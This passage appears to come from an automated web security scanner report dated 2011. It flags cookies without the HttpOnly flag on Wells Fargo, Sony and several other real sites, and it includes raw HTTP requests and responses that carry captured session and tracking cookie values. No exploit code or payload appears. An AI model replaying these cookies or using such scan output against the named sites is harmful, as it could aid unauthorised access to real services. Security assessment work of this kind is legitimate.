User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sonycard/ HTTP/1.1
Host: www.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="https://www.sonyrewards ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /TotalMerrill/pages/home.aspx HTTP/1.1
Host: www.totalmerrill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /supported-bots/forum-posting-bots/ipboard-software HTTP/1.1
Host: www.universalbot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 07ea8e9c6c6b4815a2b15bba5c0035ed=f727505d493a98b8f369b1124d09e0d7; path=/
Last-Modified: Wed, 02 Feb 2011 23:45:22 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ust/pages/index.aspx HTTP/1.1
Host: www.ustrust.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.wachovia.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="https://www.wachovia.co ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/26551757/detail.html HTTP/1.1
Host: www.wcti12.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html class="no-js"> <head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1 ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=EF949CC12A6233AB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.wellsfargo.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:00:54 GMT
Content-length: 0
Content-type: text/html
Set-Cookie: v1st=EF949CC12A6233AB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Location: https://www.wellsfargo.com/
The following cookie was issued by the application and does not have the HttpOnly flag set:
ISD_WCM_COOKIE=2549373706.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Clickthrough&RequestType=Click&COID= HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 404 Not found
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:03 GMT
Content-length: 3018
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /about/diversity/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:27 GMT
Content-length: 8581
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=FY7dNJhH8RGtvgN8pvr6lX4lzZGNk421hDYK0F55Yk6vq3xThh62!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>About Wells Fargo - Diversity ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:48 GMT
Content-length: 11460
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=KwsQNJhcppJbXh2HGTsl1xSTLrXLWgsZLDGy5r0NvKM6nG1NGQ1j!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/apply HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 301 Moved Permanently
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:49 GMT
Content-length: 15
Content-type: text/html; charset=ISO-8859-1
X-Cnection: close
Location: https://financial.wellsfargo.com/autoapp/tostep1.do?promocode=WLAA11040010
Set-Cookie: wcmcookiewf=Fv9vNJhdHXqhTvtpGZyxXhXVBryX2GtWB5ZTb3zZv6w3Q0v3XypL!1507309987; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2046057226.16927.0000; path=/
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /browser/jaws_setting HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:19 GMT
Content-length: 3286
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=gCGwNJhfWxmh2NDPMGhQzzBB1njKkFyRGKJNnjbmVQ2rzhccQTt5!-1657447489; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2348047114.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /careers/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:00 GMT
Content-length: 7617
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=sG2NNJhL8zpPgGJdS0NpchvpTRWLPJr0HLnS3ss5SYWfnJWcs2V7!1746616152; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2146720522.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /checking/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:36 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=Q3cLNJhQSJXJ01dhNTVGyQlHhTNfcGvp2PwmMkwzDRSyBnTQJh5n!1192939746; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2515819274.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /com/comintro HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:25 GMT
Location: https://www.wellsfargo.com/com/
Set-Cookie: wcmcookiewf=hdNDNJhFB2Vy1gQG4jHHJMtydYJQ6bLJT7Jc3x03KXZTLVhH4VKx!312685559; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2264161034.16927.0000; path=/
Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/com/">h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /credit_cards/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:38 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=lcphNJhSDNXQXcnvvp6Pqwv3mHjKLNpN7rmll0htLDpp25KdLbp1!-88744709; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2532596490.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /credit_cards/select_card HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:38 GMT
Location: https://www.wellsfargo.com/credit_cards/
Set-Cookie: wcmcookiewf=cnHtNJhSv05Mv5yd9N4HJR2wQH8TNThgFHky9sygWXwY8CTHxjHQ!-1273606700; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1777621770.16927.0000; path=/
Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/credit_ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /equity/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /equity/rate_payments/information/rate_calc HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:44 GMT
Location: https://www.wellsfargo.com/equity/tools/rate_calc
Set-Cookie: wcmcookiewf=LG9sNJhYpZTn2Dhm7pS2x0hcpW0hNsZJG2QzvpSYMRFWGZJ5tRlh!-705334509; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2163497738.16927.0000; path=/
Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/equity/ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /help/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:21 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=fTG5NJhBTvhh8THS9LpgByvt7m89Gy4r1dsVhd3yzr8nQnnF6vzk!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Customer Service f ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /help/faqs/signon_faqs HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:22 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=vXXtNJhCXy5g11qrwqXKMTLPF3dHrhGLJvg8Wj9MRTTBXJmf9lQT!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /help/services HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:23 GMT
Content-length: 11416
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=TYQnNJhDw4QJgQtW7VVtnt2LBv3VJm8hq3Dj4zygqfRB09vyWKnn!191917939; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Customer Service - ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /insurance/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:54 GMT
Content-length: 8678
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=FYpQNJhCkvzKSyh2MqHzf7L6MkTTHxnLMf7gMw7y6G64TqKC2T9m!-88744709; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2532596490.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /insurance/id_credit_protection/idtheft HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:55 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=9hF3NJhDTdc9PnjFnWG989NpqqdGyhQPmS2jnC9JQXqKM20QvTm9!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Identity Theft Protection - Id ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /investing/hsa/enroll HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:52 GMT
Content-length: 9955
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=rGCpNJhQ3J2yYLGgChygHTVGrrYQnxRYXjGV7X8q1RBBkR0MCZRz!1893615402; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1727290122.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Health Savings Acc ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /investing/investmentservices/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-length: 8732
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=3JcNNJhpcnnt2lQ8QP1vrTvQjGQzrsnrVYcCqTsht4tMhdvxRqh3!1507309987; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2046057226.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /investing/more HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:51 GMT
Content-length: 12093
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=2H4zNJhfczGZqD2NxFyn8Gw3cRRJsvd31PWX0Bjp5vwZRm5mlXBy!898739336; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /investing/mutual_funds/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
